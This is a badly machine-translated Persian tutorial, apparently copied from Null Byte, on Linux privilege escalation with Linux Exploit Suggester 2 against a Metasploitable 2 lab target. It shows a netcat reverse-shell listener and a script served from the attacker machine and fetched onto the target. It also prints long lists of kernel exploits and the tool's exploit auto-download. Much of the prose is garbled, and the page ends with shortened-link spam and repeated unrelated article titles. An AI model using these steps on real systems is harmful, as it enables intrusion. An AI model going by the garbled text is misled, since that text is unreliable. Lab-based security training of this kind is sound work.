Privilege escalation یکی از مهارت های ضروری یک هکر می تواند داشته باشد و اغلب جدا تازه از جوانب مثبت. با به طور مداوم در حال تغییر چشم انداز و مجموعهای از سوء استفاده وجود دارد, آن می تواند یک مشکل جنبه از هر حمله. خوشبختانه برخی از ابزار می تواند کمک به تسریع روند. لینوکس بهره برداری Suggester است تنها یکی از بسیاری برای کمک به شما از ریشه.
Privilege escalation عمل به دست آوردن دسترسی به امتیازات کاربر دیگری بر روی سیستم. می آید در دو طعم: افقی و عمودی privilege escalation.
افقی privilege escalation زمانی است که یک مهاجم دستاوردهای دسترسی به حساب کاربری دیگر به طور معمول با همان وضعیت و مجوز است. این می تواند اجازه می دهد آنها را برای دسترسی به اضافی سیستم و یا اطلاعات است اما نه به عنوان جدی عمودی آن ، عمودی privilege escalation زمانی است که یک مهاجم به دست آوردن دسترسی به یک حساب کاربری با بالابردن مانند که از یک مدیر سیستم.
Privilege escalation به خصوص عمودی نوع حیاتی است برای این مهاجم به دلیل آن اجازه می دهد تا آنها را به انجام چیزهایی که یک کاربر به طور متوسط قادر نخواهد بود به. مگر اینکه سیستم ضعیف پیکربندی استاندارد, کاربران نمی تواند معمولا اجرای کد های مخرب و یا پیکربندی سیستم در راه های نمایشی است که به نفع یک مهاجم. است که چرا privilege escalation حیاتی برای تکمیل سازش از یک هدف است.
مرحله 1: راه اندازی و اولیه سازش
برای شروع, ما با استفاده از Metasploitable 2 به عنوان هدف و Kali Linux به عنوان یک ماشین محلی است. شما می توانید با استفاده از یک شبیه راه اندازی. آماده زمانی که ما نیاز به دانلود لینوکس بهره برداری Suggester از GitHub.
بیایید فرض کنیم که هدف محدود دسترسی به اینترنت, بنابراین ما نیاز به آن را در محلی ما دستگاه برای اولین بار و انتقال آن به هدف بعد. ما می توانیم با استفاده از دستور wget برای دانلود این اسکریپت به طور مستقیم از ترمینال:
~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl --2020-02-18 12:15:58-- https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
حل و فصل raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
اتصال به raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... متصل می شود.
درخواست HTTP ارسال و در انتظار پاسخ... 200 OK
طول: 24780 (24K) [متن/ساده]
صرفه جویی به: 'linux-exploit-suggester-2.pl' linux-exploit-suggester-2.pl 100%[======================================================================================================================>] 24.20 K --.-KB/s در 0.03 s 2020-02-18 12:15:58 (718 KB/s) - 'linux-exploit-suggester-2.pl' saved [24780/24780]
در حال حاضر ما نیاز به مصالحه هدف و دسترسی به پوسته. دستور تزریق است که همیشه سرگرم کننده گزینه است. سپس هنگامی که ما در گرفتن ورودی اتصال ما می توانید بررسی کنید که ما www-data کاربر با id فرمان:
~# nc -lvnp 4321 گوش دادن در [هر] 4321 ...
اتصال به [10.10.0.1] از (UNKNOWN) [10.10.0.50] 36302
شناسه
uid=33(www-data) gid=33(www-data) گروه=33(www-data)
از اینجا ما می خواهم برای ارتقاء به طور کامل تعاملی TTY پوسته بنابراین ما باید کنترل بیشتر و می توانید با استفاده از برگه اتمام تاریخ فرمان ، هنگامی که ما به روز رسانی ما پوسته بتوانیم به یک جهان قابل نوشتن دایرکتوری بنابراین ما می توانید دریافت خواهید کرد و در نهایت این ابزار را اجرا کنید:
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shm
مرحله 2: انتقال اسکریپت به هدف
بازگشت در محلی ما ماشین اجازه تغییر نام این اسکریپت به چیزی کوتاه:
~# mv linux-exploit-suggester-2.pl les2.pl
در حال حاضر ما می تواند در خدمت اسکریپت با پایتون SimpleHTTPServer ماژول — با استفاده از -m سوئیچ برای مشخص کردن ماژول:
~ # , fuzzy, python-m SimpleHTTPServer خدمت HTTP 0.0.0.0 پورت 8000 ...
که در خدمت هر یک از مطالب در دایرکتوری بیش HTTP بر روی پورت 8000.
پشت در, هدف, ما می توانیم با استفاده از دستور wget دوباره برای بازیابی اسکریپت از ما ماشین محلی:
www-data@metasploitable:/dev/shm$ wget http://10.10.0.1:8000/les2.pl --13:43:17-- http://10.10.0.1:8000/les2.pl => `les2.pl'
اتصال به 10.10.0.1:8000... متصل می شود.
درخواست HTTP ارسال و در انتظار پاسخ... 200 OK
طول: 24,780 (24K) [متن/x-perl] 100%[=========================================================================================================================================================================>] 24,780 --.--K/s 13:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]
هنگامی که کامل ما می توانید کشتن پایتون سرور. در حال حاضر ما می توانیم نگاهی به زمان مجوز از اسکریپت ما است که ما فقط انتقال بیش از:
www-data@metasploitable:/dev/shm$ ls -la در مجموع 28
drwxrwxrwt 2 root root 60 Jun 19 13:43 .
drwxr-xr-x 13 root root 13480 Jun 19 13:28 ..
-rw-r--r-- 1 www-data www-data 24780 Feb 18 سال 2020 les2.pl
ما می توانید ببینید که آن را به عنوان خوانده شده-تنها در این نقطه پس از استفاده از chmod فرماندهی آن را اجرایی:
www-data@metasploitable:/dev/shm$ chmod +x les2.pl
در نهایت ما همه را به اجرای اسکریپت.
مرحله 3: اجرای لینوکس بهره برداری Suggester
پس ما آن را اجرایی می کنیم می توانید با استفاده از نقطه بریده بریده به اجرای لینوکس بهره برداری Suggester. استفاده از -h پرچم برای دیدن منوی help و استفاده به عنوان مثال:
www-data@metasploitable:/dev/shm$ ./les2.pl -h ############################# لینوکس بهره برداری Suggester 2
############################# طریقه استفاده: ./les2.pl [-h] [-k kernel] [-d] [-h] کمک می کند (این پیام) [k] Kernel تعداد (به عنوان مثال. 2.6.28) [-d] باز exploit دانلود منو شما همچنین می توانید یک جزئی نسخه کرنل (به عنوان مثال. 2.4) برای دیدن همه سوء استفاده در دسترس است.
اساسی ترین راه برای استفاده از این ابزار در حال اجرا است آن را بدون هیچ گزینه:
www-data@metasploitable:/dev/shm$ ./les2.pl ############################# لینوکس بهره برداری Suggester 2
############################# محلی Kernel: 2.6.24 جستجو 72 سوء استفاده... ممکن است سوء استفاده [1] آمریکا-ثبت نام-زبان
CVE-2010-4347 منبع: http://www.securityfocus.com/bid/45408 [2] can_bcm
CVE-2010-2959 منبع: http://www.exploit-db.com/exploits/14814 [3] dirty_cow
CVE-2016-5195 منبع: http://www.exploit-db.com/exploits/40616 [4] do_pages_move Alt: غربال CVE-2010-0415 منبع: Spenders روشنگری [5] exploit_x
CVE-2018-14665 منبع: http://www.exploit-db.com/exploits/45697 [6] half_nelson1 Alt: econet CVE-2010-3848 منبع: http://www.exploit-db.com/exploits/17787 [7] half_nelson2 Alt: econet CVE-2010-3850 منبع: http://www.exploit-db.com/exploits/17787 [8] half_nelson3 Alt: econet CVE-2010-4073 منبع: http://www.exploit-db.com/exploits/17787 [9] msr
CVE-2013-0268 منبع: http://www.exploit-db.com/exploits/27297 [10] لوله.c_32bit
CVE-2009-3547 منبع: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c [11] pktcdvd
CVE-2010-3437 منبع: http://www.exploit-db.com/exploits/15150 [12] reiserfs
CVE-2010-1146 منبع: http://www.exploit-db.com/exploits/12130 [13] sock_sendpage Alt: wunderbar_emporium CVE-2009-2692 منبع: http://www.exploit-db.com/exploits/9435 [14] sock_sendpage2 Alt: proto_ops CVE-2009-2692 منبع: http://www.exploit-db.com/exploits/9436 [15] video4linux
CVE-2010-3081 منبع: http://www.exploit-db.com/exploits/15024 [16] vmsplice1 Alt: jessica biel CVE-2008-0600 منبع: http://www.exploit-db.com/exploits/5092 [17] vmsplice2 Alt: diane_lane CVE-2008-0600 منبع: http://www.exploit-db.com/exploits/5093
لینوکس بهره برداری Suggester کار می کند با گرفتن نسخه کرنل و مقایسه آن را به یک لیست از سوء استفاده احتمالی. در بالا ما می توانید ببینید که آن را بازگشت یک تعداد انگشت شماری از پتانسیل سوء استفاده از لیست مربوطه نام CVE شماره و لینک به منبع.
ما همچنین می توانید با استفاده از -k switch برای مشخص کردن نسخه کرنل به صورت دستی. بیایید تایید کرنل تعداد با uname -r فرماندهی:
www-data@metasploitable:/dev/shm$ uname -r 2.6.24-16-سرور
به جای استفاده از نسخه دقیق تعداد ما کوتاه می توانید آن را به 2.6 از سیستم های اغلب می تواند آسیب پذیر به کمی مسن تر سوء استفاده و همچنین:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 ############################# لینوکس بهره برداری Suggester 2
############################# محلی Kernel: 2.6 جستجو 72 سوء استفاده... ممکن است سوء استفاده [1] آمریکا-ثبت نام-زبان (2.6.0)
CVE-2010-4347 منبع: http://www.securityfocus.com/bid/45408 [2] can_bcm (2.6.18)
CVE-2010-2959 منبع: http://www.exploit-db.com/exploits/14814 [3] caps_to_root (2.6.34)
CVE-n/a منبع: http://www.exploit-db.com/exploits/15916 [4] dirty_cow (2.6.22)
CVE-2016-5195 منبع: http://www.exploit-db.com/exploits/40616 [5] do_pages_move (2.6.18) Alt: غربال CVE-2010-0415 منبع: Spenders روشنگری [6] elfcd (2.6.12) [7] exit_notify (2.6.25) منبع: http://www.exploit-db.com/exploits/8369 [8] exp.sh (2.6.9) [9] exploit_x (2.6.22)
CVE-2018-14665 منبع: http://www.exploit-db.com/exploits/45697 [10] ftrex (2.6.11)
CVE-2008-4210 منبع: http://www.exploit-db.com/exploits/6851 [11] h00lyshit (2.6.8)
CVE-2006-3626 منبع: http://www.exploit-db.com/exploits/2013 [12] half_nelson1 (2.6.0) Alt: econet CVE-2010-3848 منبع: http://www.exploit-db.com/exploits/17787 [13] half_nelson2 (2.6.0) Alt: econet CVE-2010-3850 منبع: http://www.exploit-db.com/exploits/17787 [14] half_nelson3 (2.6.0) Alt: econet CVE-2010-4073 منبع: http://www.exploit-db.com/exploits/17787 [15] kdump (2.6.13) [16] krad (2.6.5) [17] krad3 (2.6.5) منبع: http://exploit-db.com/exploits/1397 [18] local26 (2.6.13) [19] memodipper (2.6.39)
CVE-2012-0056 منبع: http://www.exploit-db.com/exploits/18411 [20] msr (2.6.18)
CVE-2013-0268 منبع: http://www.exploit-db.com/exploits/27297 [21] newsmp (2.6) [22] ong_bak (2.6.5) [23] لوله.c_32bit (2.6.15)
CVE-2009-3547 منبع: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c [24] pktcdvd (2.6.0)
CVE-2010-3437 منبع: http://www.exploit-db.com/exploits/15150 [25] prctl (2.6.13) منبع: http://www.exploit-db.com/exploits/2004 [26] prctl2 (2.6.13) منبع: http://www.exploit-db.com/exploits/2005 [27] prctl3 (2.6.13) منبع: http://www.exploit-db.com/exploits/2006 [28] prctl4 (2.6.13) منبع: http://www.exploit-db.com/exploits/2011 [29] ptrace_kmod2 (2.6.26) Alt: ia32syscall,robert_you_suck CVE-2010-3301 منبع: http://www.exploit-db.com/exploits/15023 [30] pwned (2.6.11) [31] py2 (2.6.9) [32] raptor_prctl (2.6.13)
CVE-2006-2451 منبع: http://www.exploit-db.com/exploits/2031 [33] rawmodePTY (2.6.31)
CVE-2014-0196 منبع: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c [34] rds (2.6.30)
CVE-2010-3904 منبع: http://www.exploit-db.com/exploits/15285 [35] reiserfs (2.6.18)
CVE-2010-1146 منبع: http://www.exploit-db.com/exploits/12130 [36] sctp (2.6.26)
CVE-2008-4113 [37] semtex (2.6.37)
CVE-2013-2094 منبع: http://www.exploit-db.com/exploits/25444 [38] sock_sendpage (2.6.0) Alt: wunderbar_emporium CVE-2009-2692 منبع: http://www.exploit-db.com/exploits/9435 [39] sock_sendpage2 (2.6.0) Alt: proto_ops CVE-2009-2692 منبع: http://www.exploit-db.com/exploits/9436 [40] stackgrow2 (2.6.10) [41] udev (2.6.25) Alt: udev <1.4.1 CVE-2009-1185 منبع: http://www.exploit-db.com/exploits/8478 [42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698 منبع: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c [43] uselib24 (2.6.10) [44] vconsole (2.6)
CVE-2009-1046 [45] video4linux (2.6.0)
CVE-2010-3081 منبع: http://www.exploit-db.com/exploits/15024 [46] vmsplice1 (2.6.17) Alt: jessica biel CVE-2008-0600 منبع: http://www.exploit-db.com/exploits/5092 [47] vmsplice2 (2.6.23) Alt: diane_lane CVE-2008-0600 منبع: http://www.exploit-db.com/exploits/5093
ما می توانید ببینید که آن را به ما یک مقدار بزرگتر از سوء استفاده احتمالی.
آخرین گزینه لینوکس بهره برداری Suggester فراهم می کند توانایی به طور خودکار دانلود بهره برداری از اسکریپت برای هر بازی آن را می یابد. استفاده از -d پرچم برای فعال کردن این گزینه:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 -d ############################# لینوکس بهره برداری Suggester 2
############################# محلی Kernel: 2.6 جستجو 72 سوء استفاده... ممکن است سوء استفاده [1] آمریکا-ثبت نام-زبان (2.6.0)
CVE-2010-4347 منبع: http://www.securityfocus.com/bid/45408 [2] can_bcm (2.6.18)
CVE-2010-2959 منبع: http://www.exploit-db.com/exploits/14814 [3] caps_to_root (2.6.34)
CVE-n/a منبع: http://www.exploit-db.com/exploits/15916 [4] dirty_cow (2.6.22)
CVE-2016-5195 منبع: http://www.exploit-db.com/exploits/40616 [5] do_pages_move (2.6.18) Alt: غربال CVE-2010-0415 منبع: Spenders روشنگری [6] elfcd (2.6.12) [7] exit_notify (2.6.25) منبع: http://www.exploit-db.com/exploits/8369 [8] exp.sh (2.6.9) [9] exploit_x (2.6.22)
CVE-2018-14665 منبع: http://www.exploit-db.com/exploits/45697 [10] ftrex (2.6.11)
CVE-2008-4210 منبع: http://www.exploit-db.com/exploits/6851 [11] h00lyshit (2.6.8)
CVE-2006-3626 منبع: http://www.exploit-db.com/exploits/2013 [12] half_nelson1 (2.6.0) Alt: econet CVE-2010-3848 منبع: http://www.exploit-db.com/exploits/17787 [13] half_nelson2 (2.6.0) Alt: econet CVE-2010-3850 منبع: http://www.exploit-db.com/exploits/17787 [14] half_nelson3 (2.6.0) Alt: econet CVE-2010-4073 منبع: http://www.exploit-db.com/exploits/17787 [15] kdump (2.6.13) [16] krad (2.6.5) [17] krad3 (2.6.5) منبع: http://exploit-db.com/exploits/1397 [18] local26 (2.6.13) [19] memodipper (2.6.39)
CVE-2012-0056 منبع: http://www.exploit-db.com/exploits/18411 [20] msr (2.6.18)
CVE-2013-0268 منبع: http://www.exploit-db.com/exploits/27297 [21] newsmp (2.6) [22] ong_bak (2.6.5) [23] لوله.c_32bit (2.6.15)
CVE-2009-3547 منبع: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c [24] pktcdvd (2.6.0)
CVE-2010-3437 منبع: http://www.exploit-db.com/exploits/15150 [25] prctl (2.6.13) منبع: http://www.exploit-db.com/exploits/2004 [26] prctl2 (2.6.13) منبع: http://www.exploit-db.com/exploits/2005 [27] prctl3 (2.6.13) منبع: http://www.exploit-db.com/exploits/2006 [28] prctl4 (2.6.13) منبع: http://www.exploit-db.com/exploits/2011 [29] ptrace_kmod2 (2.6.26) Alt: ia32syscall,robert_you_suck CVE-2010-3301 منبع: http://www.exploit-db.com/exploits/15023 [30] pwned (2.6.11) [31] py2 (2.6.9) [32] raptor_prctl (2.6.13)
CVE-2006-2451 منبع: http://www.exploit-db.com/exploits/2031 [33] rawmodePTY (2.6.31)
CVE-2014-0196 منبع: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c [34] rds (2.6.30)
CVE-2010-3904 منبع: http://www.exploit-db.com/exploits/15285 [35] reiserfs (2.6.18)
CVE-2010-1146 منبع: http://www.exploit-db.com/exploits/12130 [36] sctp (2.6.26)
CVE-2008-4113 [37] semtex (2.6.37)
CVE-2013-2094 منبع: http://www.exploit-db.com/exploits/25444 [38] sock_sendpage (2.6.0) Alt: wunderbar_emporium CVE-2009-2692 منبع: http://www.exploit-db.com/exploits/9435 [39] sock_sendpage2 (2.6.0) Alt: proto_ops CVE-2009-2692 منبع: http://www.exploit-db.com/exploits/9436 [40] stackgrow2 (2.6.10) [41] udev (2.6.25) Alt: udev <1.4.1 CVE-2009-1185 منبع: http://www.exploit-db.com/exploits/8478 [42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698 منبع: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c [43] uselib24 (2.6.10) [44] vconsole (2.6)
CVE-2009-1046 [45] video4linux (2.6.0)
CVE-2010-3081 منبع: http://www.exploit-db.com/exploits/15024 [46] vmsplice1 (2.6.17) Alt: jessica biel CVE-2008-0600 منبع: http://www.exploit-db.com/exploits/5092 [47] vmsplice2 (2.6.23) Alt: diane_lane CVE-2008-0600 منبع: http://www.exploit-db.com/exploits/5093 Exploit دانلود (دانلود همه: 'a' / به صورت جداگانه: '2,4,5' / خروج: ^c) انتخاب سوء استفاده برای دانلود:
پس از آن تعیین پتانسیل سوء استفاده ما با ارائه گزینه ای برای دانلود یا تمام اسکریپت ها و یا فردی اسکریپت. برای مثال اگر ما می خواستیم برای دانلود udev بهره برداری ما را به سادگی ورودی مربوطه آن شماره ID:
Exploit دانلود (دانلود همه: 'a' / به صورت جداگانه: '2,4,5' / خروج: ^c) را انتخاب کنید به سوء استفاده دانلود: 41 دانلود https://www.exploit-db.com/raw/8478 -> exploit_udev
نگه داشتن در ذهن از ویژگی های نیاز به اتصال به اینترنت فعال بنابراین اگر دسترسی محدود شده است به هیچ وجه آن را نمی خواهد کار. هنوز لینوکس بهره برداری Suggester باعث می شود آن را بسیار آسان برای به دست آوردن بهره برداری اسکریپت در سمت راست هدف است. از این نقطه, آن فقط یک ماده از افزایش دسترسی به ریشه.
کاغذ بسته بندی
در این آموزش ما یاد گرفته در مورد privilege escalation و یک ابزار به نام لینوکس بهره برداری Suggester. ما توافق اولیه سازش و انتقال اسکریپت به هدف. ما پس از آن قادر به اجرای آن و پوشش چند استفاده از آن گزینه ها ممکن است به کشف سوء استفاده است که می تواند مورد استفاده قرار گیرد به ریشه. Privilege escalation است بخشی جدایی ناپذیر از هر هکر روش و لینوکس بهره برداری Suggester است فقط یک ابزار برای کمک به این هدف است.
می خواهید شروع به ساختن پول به عنوان یک کلاه سفید هکر? پرش شروع خود را-کلاه سفید هک حرفه ای با ما 2020 حق بیمه هک اخلاقی, گواهینامه آموزشی از بسته نرم افزاری جدید Null Byte فروشگاه و دریافت بیش از 60 ساعت آموزش از هک اخلاقی حرفه ای است.
خرید در حال حاضر (96٪) >
tinyurlis.gdu.nuclck.ruulvis.netshrtco.de
مقالات مشابه
- Cavs' عشق, خادم خوشحال نیست که بخشی از NBA 'حذف 8'
- شرکت صادرات و واردات کالاهای مختلف از جمله کاشی و سرامیک و ارائه دهنده خدمات ترانزیت و بارگیری دریایی و ریلی و ترخیص کالا برای کشورهای مختلف از جمله روسیه و کشورهای حوزه cis و سایر نقاط جهان - بازرگانی علی قانعی
- به یاد هومر هر بچه از خواب
- شرکت صادرات و واردات کالاهای مختلف از جمله کاشی و سرامیک و ارائه دهنده خدمات ترانزیت و بارگیری دریایی و ریلی و ترخیص کالا برای کشورهای مختلف از جمله روسیه و کشورهای حوزه cis و سایر نقاط جهان - بازرگانی علی قانعی
- کشیدن نیست Blake اسنل برای COVID-19 نگرانی
- شرکت صادرات و واردات کالاهای مختلف از جمله کاشی و سرامیک و ارائه دهنده خدمات ترانزیت و بارگیری دریایی و ریلی و ترخیص کالا برای کشورهای مختلف از جمله روسیه و کشورهای حوزه cis و سایر نقاط جهان - بازرگانی علی قانعی
- شرکت صادرات و واردات کالاهای مختلف از جمله کاشی و سرامیک و ارائه دهنده خدمات ترانزیت و بارگیری دریایی و ریلی و ترخیص کالا برای کشورهای مختلف از جمله روسیه و کشورهای حوزه cis و سایر نقاط جهان - بازرگانی علی قانعی
- میوک در مقابل کورمیر: چه کسی برنده مسابقه لاستیکی است؟
- 'F*** کردن' - لمپارد می گوید زیدان به "نشستن" به عنوان بخشی از نیمکت درگیری
- شرکت صادرات و واردات کالاهای مختلف از جمله کاشی و سرامیک و ارائه دهنده خدمات ترانزیت و بارگیری دریایی و ریلی و ترخیص کالا برای کشورهای مختلف از جمله روسیه و کشورهای حوزه cis و سایر نقاط جهان - بازرگانی علی قانعی